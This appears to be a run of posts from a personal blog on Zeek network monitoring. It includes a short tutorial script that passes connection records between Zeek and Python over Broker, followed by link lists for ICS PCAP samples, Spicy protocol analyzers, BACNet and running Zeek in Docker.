received some_test_event  --   [(IPv4Address('172.20.32.200'), 47808/udp, IPv4Address('172.20.32.109'), 47808/udp)]

In the Zeek script content below you will find the event “python_results” is handled here:

https://github.com/keithjjones/zeek-python-broker-demo/blob/master/broker-test.zeek#L6

It just prints the arguments to the event. In “connection_state_remove” the script sends the “c$id” conn_id record to Python:

https://github.com/keithjjones/zeek-python-broker-demo/blob/master/broker-test.zeek#L11-L14

Therefore, this is the same data that will be printed when it is returned via “python_results”.

global test_topic = "/topic/test";

global some_test_event: event(c_id: conn_id);

event python_results(c_id: conn_id)
{
	print(cat("Got Python Results: ", c_id));
}

event connection_state_remove(c: connection)
{
    Broker::publish(test_topic, some_test_event, c$id);
}

event zeek_init()
{
	Broker::peer(addr_to_uri(127.0.0.1), 60000/tcp);
	Broker::subscribe(test_topic);
}

The two lines in “zeek_init” take care of connecting to the Python process before publishing the results to the “/topic/test” topic in Zeek’s Broker.

When running the Zeek script on a PCAP while the Python script is executing in another window, you will see the connection ID records printed from the Zeek and the Python processes in their respective windows as they are processed. This will prove that the data was transferred from your PCAP through Zeek, into Python over Zeek’s Broker, and back to Zeek again over Broker. This is example output from the Zeek script:

Got Python Results: [orig_h=172.20.32.200, orig_p=47808/udp, resp_h=172.20.32.115, resp_p=47808/udp]
Got Python Results: [orig_h=172.20.32.200, orig_p=47808/udp, resp_h=172.20.32.112, resp_p=47808/udp]
Got Python Results: [orig_h=172.20.32.200, orig_p=47808/udp, resp_h=172.20.32.110, resp_p=47808/udp]
Got Python Results: [orig_h=172.20.32.200, orig_p=47808/udp, resp_h=172.20.32.121, resp_p=47808/udp]
Got Python Results: [orig_h=172.20.32.200, orig_p=47808/udp, resp_h=172.20.32.109, resp_p=47808/udp]

Now imagine all the new types of processing you can do in Python that may have been more difficult with Zeek alone!

The post How To Connect Zeek To Python first appeared on DrKeithJones.com.

In this video I walk through several resources to download ICS protocol PCAPs:

• https://www.netresec.com/?page=PCAP4SICS
• https://www.netresec.com/?page=PcapFiles
• https://github.com/automayt/ICS-pcap
• https://www.icsdefense.net/pcap
• https://github.com/mmguero-dev/Malcolm-PCAP
• https://github.com/ControlThings-io/ct-samples/tree/master/Protocols
• https://kargs.net/captures/
• https://www.controlthings.io/resources
• https://docs.google.com/spreadsheets/d/1G3WStQJpTKe6DfQlq7knpZSK8AcxG4eQDj1HLk8LZq0/edit#gid=0

The post Industrial Control Systems (ICS) PCAP Resources For Zeek And Wireshark first appeared on DrKeithJones.com.

In this presentation I walk through every line of code in the open source Zeek Spicy Wireguard VPN protocol analyzer. It’s more fun than it sounds, honestly.

Spicy documentation: https://docs.zeek.org/projects/spicy/en/latest/index.html

Slides: https://docs.google.com/presentation/d/1LOCtYEr8cJ_DLqcjJoyUu1g7-iQbOjS45AnDjzknL7U/edit?usp=sharing

The post Understanding The Zeek Spicy Wireguard VPN Protocol Analyzer first appeared on DrKeithJones.com.

• Slides: https://docs.google.com/presentation/d/17PZEH5G04RGtb78WDiCZjSTl58EKh_WmztzVdzo0eME/edit?usp=sharing
• https://youtu.be/wmm-6ZggwNc

The post Anatomy Of A Zeek Spicy Protocol Analyzer first appeared on DrKeithJones.com.

We look at what BACNet traffic looks like in Zeek, along the way explaining some BACNet basics.

• https://youtu.be/C1y6UY_ithk
• Slides: https://docs.google.com/presentation/d/1mlUrkSQqI1cES8ma-ZV2Qp62xWpBOL6IkHIKqIQ-niw/edit?usp=sharing

The post BACNet Basics With Zeek first appeared on DrKeithJones.com.

Here you will learn to run Zeek and Spicy in a Docker container. I do this often to test my code on different versions of Zeek without having to fully install each version.

• https://youtu.be/s5XT71sx47I
• Slides: https://docs.google.com/presentation/d/1zZqG7GjTh_cafqa6NQ86J4TW71mnEF7oK2HfkLqifvI/edit?usp=sharing

The post Easily Run Zeek and Spicy in a Docker Container first appeared on DrKeithJones.com.

• Youtube: https://youtube.com/watch?v=bYRavdBxMsM&feature=shares
• Slides: https://docs.google.com/presentation/d/1A1B1h4lSh7SuUmcgOLDcw9ECQunWUvLhCz2k7DQqO4o/edit?usp=sharing

The post Create a Zeek Spicy Analyzer from a Template first appeared on DrKeithJones.com.

The post Welcome! first appeared on DrKeithJones.com.